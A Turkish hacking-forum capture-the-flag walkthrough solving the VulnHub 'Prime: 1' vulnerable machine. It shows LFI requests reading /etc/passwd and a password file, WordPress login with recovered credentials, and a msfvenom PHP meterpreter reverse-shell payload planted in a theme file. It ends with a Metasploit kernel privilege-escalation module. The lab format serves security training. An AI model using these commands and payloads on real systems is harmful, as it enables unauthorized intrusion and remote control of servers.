THT DUYURU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

Prime: 1 Zafiyetli Makine Çözümü //"P4RS

"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.569
Konular:
481
Teşekkür (Etti):
1129
Teşekkür (Aldı):
2281
Ticaret:
(0) %
18-09-2019 10:11
#1
Prime: 1 Zafiyetli Makine Çözümü //"P4RS
Merhabalar TürkHackTeam ailesi, bugün sizlere Prime: 1 zafiyetli makinesinin çözümünü göstereceğim.






https://www.vulnhub.com/entry/prime-1,358/




Makine İsmi: PRİME:1

Yayınlanma Tarihi: 1 Eylül 2019

Yapımcı: Suraj Pandey

Seri: Prime

Açıklama: Hedefin root.txt ve user.txt okumak.

Zorluk: Orta Seviye

Dosya Boyutu: 2.2 GB

İşletim Sistemi: Linux/Ubuntu




İlk öncelikle makinemizi açalım ve görüntüsüne bir bakalım.



Bir giriş ekranı geldi ve şifreyi password.txt dosyasından bulmamızı istiyor.
Makinemizin IP adresini öğrenmek için saldırı makinemizde netdiscover'ı açacağız. Terminale
Kod:
sudo netdiscover
yazalım.



Gördüğünüz gibi IP adresini öğrendik.



Şimdi de nmap taraması yapalım. Bunun için
Kod:
nmap -A IP_adresi
Gördüğünüz gibi 80 ve 22 portları açık. Bir sitesi var demek ki



Siteye gidelim tarayıcımıza IP_ADRESİ yazmanız yeterli olacaktır.



Bir de sitenin dizinlerine bakalım bunun için de dirb aracını kullanacağız. Terminale gelerek
Kod:
dirb http://IP_adresi
yazalım.
Burada /dev ve /wordpress dizinlerini bulduk. Bunlar sitenin wordpress kullandığı anlamına gelir.



Öncelikle /dev[ dizinine bakalım.



Bizlere bir mesaj bırakmış ve buradan bir şey alamadık. Şimdi de Wordpress dizinine gidelim.



Sayfaya biraz göz attığımızda Victor ismine rastladık. Bu da yöneticimiz olabileceği anlamına geliyor. İlk baş nerede rastlamıştık? Makinemizin giriş ekranında.

Şimdi dizinlerden bir yere kadar gidebildik. Belki bir .txt dosyası buluruz umuduyla dirb'e tekrar dönelim. Terminale
Kod:
dirb http://IP-ADRESI -T .txt
yazalım.



Bizlere bir mesajı daha var, bir GitHub adresi vermiş ve l o c a t i o n.txt dosyası olduğunu bizlere söyledi. Önce GitHub adresine bir bakalım.



Kodları incelediğimiz de ve çalıştırmaya çalıştığımız da hiçbiri çalışmadı. Ben de "File" kısmından şüphelendim.



Tarayıcıma gelerek
Kod:
IP_ADRESI/inex.php?file
yazdım ve bir sayfa daha açıldı. Aşağıda yapımcı bizlere bir mesaj bırakmış, "Yanlış dosyayı kazıyorsun" demiş.



Aklıma file parametresinin yanına l o c a ti on.txt yazmak geldi, bizlere ipucunu vermişti hatırlarsanız.



Ve l o c a t i o n.txt dosyasına erişebildik, bunun bizlere söylediği şey LFI açığı olduğudur. Altta da bizlere secrettire360 parametre olarak kullanmamızı söylüyor.

Biraz uğraş sonucu image dizinin de olduğunu buldum. Tarayıcıma
Kod:
IP_ADRESI/image.php?secrettire360=/etc/passwd
yazıyorum.



Ve boom! Bizlere saket dizinin de password.txt dosyası olduğunu gösterdi.
Buna göre bir URL yazıyoruz
Kod:
IP_ADRESI/image.php?secrettire360=/home/saket/password.txt
yazıyoruz ve şifremizi alıyoruz.



Biz bu makine de WordPress kullandıklarını biliyorduk. Sayfa da Wordpress login ekranına gelelim.
Kod:
IP_ADRESS/wordpress/wp-login.php
Şimdi burada kullanıcı adı olarak victor yazacağız, şifre olarakta follow_the_ippsec yazıyoruz ve giriş yapıyoruz.



Giriş yapınca Temalar kısmına gelerek editleme yetkimizin olup olmadığına bakıyoruz. Hiçbirin de yok derken secret.php dosyasını gördük ve ona da bir baktık ki bunda editleme yetkimiz var.



Buraya bir shell atmamız lazım, bunun için de msfvenom kullanacağız. Terminali açalım ve
Kod:
msfvenom -p php/meterpreter/reverse_tcp lhost=Saldiri_Makine_IP_ADRESİ lport=4444 R
yazıyoruz ve shell'imiz hazır. Bunu kopyalayıp secret.php kaydediyoruz.



Bunu kopyalayıp secret.php kaydediyoruz.





Şimdi msfconsole'u açıyoruz ve içine
Kod:
 use exploit/multi/handler
yazıyoruz. Ardından gerekli yerleri dolduracağız.
Kod:
set lhost SALDIRGAN_MAKINE_IP_ADRESI
Kod:
set lport 4444
ve
Kod:
exploit
diyoruz.



Dedikten sonra tarayıcımıza gelerek shell'i açıyoruz
Kod:
IP_ADRESI/wordpress/wp-content/themes/twentynineteen/secret.php
yazıyoruz.



Zaten msfconsole'un bağlandığını göreceksiniz.



Makinemiz hakkında bilgi almak için
Kod:
sysinfo
diyoruz ve 4.10.0-28 versiyonu olduğunu öğrendik (Bu birazdan işimize yarayacak.) ve session 1 de olduğumuzu öğrendik.

Şimdi user.txt şifresini almak için
Kod:
ls /home
Kod:
ls
arından
Kod:
ls saket
ve oradan da
Kod:
cat user.txt
yazarak user flag'ımızı aldık.



Şimdi root flagını alacağız bunu için yetki yükselteceğiz. Google'a gelerek 4.10.0-28 kernel exploit yazıyoruz ve rapid7 sitesine giriyoruz.



İlk öncelikle rapid7'den aldığımız exploiti kopyalayalım. Terminalden çıkmadan (exploit/multi/handler kısmında) bg yazalım. Daha sonra
Kod:
use exploit/linux/local/bpf_sign_extension_priv_esc
yazalım.
Ardından
Kod:
set session 1
ve
Kod:
exploit
yazarak içeri girelim.

Buradan
Kod:
cd /root
ile root dizinine girelim ve içeri de ne olduğunu görmek için
Kod:
ls
yazalım.



İşte bulduk!! Aşağıda root.txt dosyası var.
Kod:
cat root.txt
yazalım ve root flagımızı alalım.

İşlem bu kadardı arkadaşlar, farklı çözüm yöntemleri de olabilir var ise yazarsanız sevinirim





Başka bir konumda görüşmek üzere, sağlıcakla kalın..



Konu "P4RS tarafından (10-02-2020 22:23 Saat 22:23 ) değiştirilmiştir.
tobleroneS - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2019
Mesajlar:
1
Konular:
0
Teşekkür (Etti):
1
Teşekkür (Aldı):
0
Ticaret:
(0) %
04-10-2019 16:49
#2
Cevap: Prime: 1 Zafiyetli Makine Çözümü //"P4RS
teşekkürler güzel paylaşım

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler